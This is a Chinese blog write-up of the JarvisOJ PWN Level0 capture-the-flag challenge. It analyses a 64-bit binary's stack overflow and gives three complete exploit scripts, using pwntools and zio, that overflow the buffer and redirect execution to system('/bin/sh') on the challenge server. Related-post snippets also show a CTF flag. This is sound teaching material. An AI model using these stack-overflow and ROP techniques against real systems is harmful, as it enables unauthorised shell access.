JarvisOJ-PWN-Level0

最新推荐文章于 2020-12-20 12:02:16 发布
最新推荐文章于 2020-12-20 12:02:16 发布
阅读量779 收藏
点赞数
分类专栏: Jarvis OJ writup (PWN)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/79571840
版权

JarvisOJ-PWN-Level0

IDA打开分析。
在Export找到这两个关键函数。
这里写图片描述
先双击进入main
这里写图片描述
关键函数在vulnerable_function(),继续跟进。
这里写图片描述
可以看出read函数是把标准输入的200位的写入buf中。
再看buf:
低位:
这里写图片描述
高位:
这里写图片描述
所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x0000000000000080)=0x88。
200>88,促发栈溢出漏洞。
关于栈溢出漏洞的详情可以看这个:
https://www.cnblogs.com/dwlsxj/p/StackOverflow.html

然后我们在Export打开callsystem
这里写图片描述
F5知道这个函数就是执行system(“/bin/sh”)。
所以前面栈溢出的位置可以直接跳到这个函数。
也就是0x400596,小端序为 : \x96\x05\x40\x00
所以,可以构造payload=0x88*’a’+”\x96\x05\x40\x00”
所以,代码为:

from pwn import*
r=remote('pwn2.jarvisoj.com','9881')
pad='a'*0x88
add=p64(0x400596)#等价于"\x96\x05\x40\x00"
payload=pad+add
r.send(payload)
r.interactive()

或者用zio:

from zio import *
sh = zio(('pwn2.jarvisoj.com', 9881))#这里注意括号
padding = "A"*0x88
addr = l64(0x400596)
shellcode = padding + addr
sh.write(shellcode)
sh.interact()

如果不知道callsystem也行。
看了下大佬的:

from pwn import *
level0 = ELF('./level0')
systemplt = level0.plt['system']
print hex(systemplt)
system = 0x400460
#0x0000000000400663 pop edi ret
sh = remote('pwn2.jarvisoj.com', 9881)
padding = "A"*0x88
addr = p64(0x400663)
argv =  p64(0x400684)# /bin/sh
shellcode = padding + addr + argv +p64(system)
sh.send(shellcode)
sh.interactive()
Jaken1223
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1207
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
笔记向——PWN jarvis oj level0
m0_52133692的博客
11-11 186
题目下载链接:https://dn.jarvisoj.com/challengefiles/level0.b9ded3801d6dd36a97468e128b81a65d 地址:nc pwn2.jarvisoj.com 9881 本人环境: ida反汇编工具(吾爱破解可下载到) 系统Ubuntu 18.04(linux的一个版本) pwntools(终端输入:sudo pip pwntools install 即可安装) pwndbg(终端输入:sudo clone https://github.com/p
Jarvis Oj Pwn 学习笔记-level0
baoan4763的博客
05-31 181
一道64位的pwn题 呈上地址: 原文件:https://files.cnblogs.com/files/Magpie/level0.rar nc pwn2.jarvisoj.com 9881 先查一下保护: 扔进ida: 典型的64位栈溢出,莫得啥子难度,注意一哈64位即可 控制流打到callsystem即可 地址是:0x400596 直接贴ex...
jarvisoj pwn level0
Joey_l的博客
07-31 323
前几天做了几道pwn题,记录一下 https://www.jarvisoj.com/challenges 拿到程序后先file可知为64位程序和动态链接 file level0 然后checksec检查保护机制 checksec level0 将程序拖到ida中,F5反汇编,得到伪c代码 双击vulnerable_function()函数 可以看到read函数读0x200进入...
jarvisoj_level0
shisuan1的博客
11-05 1879
jarvisoj_level0 通过命令检查文件类型file level0发现是64位的可执行文件 然后用64-ida打开 按F5显示伪代码,很简单这是一个hello world的程序 然后开始分析 可以看到main函数一共调用了三个函数 然后依次检查函数,检查 通过网上答案发现vunlnerable_function这个函数调用了200h的内存空间,其实作者也看不懂,建议进行这一步时先看...
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 900
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
Jarvis OJ--level3
Kni9hT's Blog
11-10 247
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 275
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
Jarvis OJ --level4
Kni9hT's Blog
11-11 248
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 381
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
【BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 678
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
Jarvis OJPWNlevel0
qq_43409582的博客
09-11 228
0x01 开始做Jarvisoj上的题了,先从最基本的开始吧。 首先看保护: 只开了NX,说明可能要利用栈溢出的知识。 打开IDA看main函数没什么东西,但return了一个函数打开一看发现了栈溢出漏洞: 然后找能利用的地方,发现了一个callsystem函数(太明显了)。。。 所以思路就是利用栈溢出漏洞直接覆盖到/bin/sh执行的地址上,就能getshell 了。 exp.py: f...
jarvisOJ-level0
qq_35661990的博客
09-28 293
jarvisOJ上的题目梯度似乎比pwnable.tw上的题目更合理点,pwnable.kr目前做的十几题都是考察各种基础,只有少数像pwn题。 level0是考最基础的ROP 先把下载的文件放进IDA里看看 .text:00000000004005C6 main proc near ; DATA XREF: _start+1D↑o .te...
Jarvis OJ [XMAN]level0
九层台
07-07 450
查保护和运行操作系统 liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0' Arch: amd64-64-little RELRO: No RELRO Stack: No canary foun...
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 939
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf里面输入shellcode和填...
pwn_level0
qq_42956710的博客
08-15 2658
level0(deepin解题记录) 打开链接: 判断了下文件类型及其保护 在终端里面运行一下: 64位的,所以就用idax64打开 看一下数据位置: 其中有bin/sh, 里面有几个函数需要看看,callsystem,main,read,vulnerable_function 栈溢出,由于没有NX保护和开栈保护,为了得到shell,可以找一个输入没有限制的...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值